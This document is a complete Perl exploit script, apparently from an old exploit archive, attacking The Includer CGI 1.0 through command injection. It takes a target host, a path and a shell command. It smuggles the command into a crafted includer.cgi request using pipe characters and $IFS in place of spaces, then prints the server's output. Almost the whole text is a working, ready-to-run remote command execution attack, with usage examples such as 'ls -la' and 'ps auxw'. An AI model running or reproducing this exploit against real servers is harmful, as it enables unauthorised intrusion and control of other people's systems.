############################################################ # Target - The Includer CGI <= 1.0 # # # # Based on - http://www.milw0rm.com/id.php?id=862 # # # # Info about bug - Stupid use "Open" function. # # # ############################################################ # If you want know more visit our home page at nst.void.ru # ############################################################ use IO::Socket; if (@ARGV < 3) { print " \n Includer CGI <= 1.0 Network Security Team - nst.void.ru\n\n"; print " Usage: \n\n"; print " - Host name of taget.\n"; print " - If not in dir type / symbol.\n"; print " - command for execution.\n\n"; print " Examples:\n\n"; print " incl_10.pl /cgi-bin/ \"ls -la\"\n"; print " incl_10.pl / \"uname -a\"\n"; print " incl_10.pl www.test.com / \"ps auxw\"\n"; exit(); } $serv = $ARGV[0]; $serv =~ s/http:\/\///ge; $dir = $ARGV[1]; $cmd = $cmde = $ARGV[2]; print "\n ===[ Info for query ]========================\n"; print " = Target: $serv\n"; print " = Dir: $dir\n"; print " = Cmd: $cmd\n"; print " =============================================\n\n"; $cmde =~ s/ /"\$IFS"/ge; $req = "GET http://$serv"; $req .= "$dir"; $req .= "includer.cgi?|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n"; $s = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - Can't connect to the server\n"; print $s $req; $flag = 0; while ($ans = <$s>) { if ($ans =~ /_T_/) { print " =========================================================\n"; exit() } if ($flag == 1) { print " $ans"; } if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 } }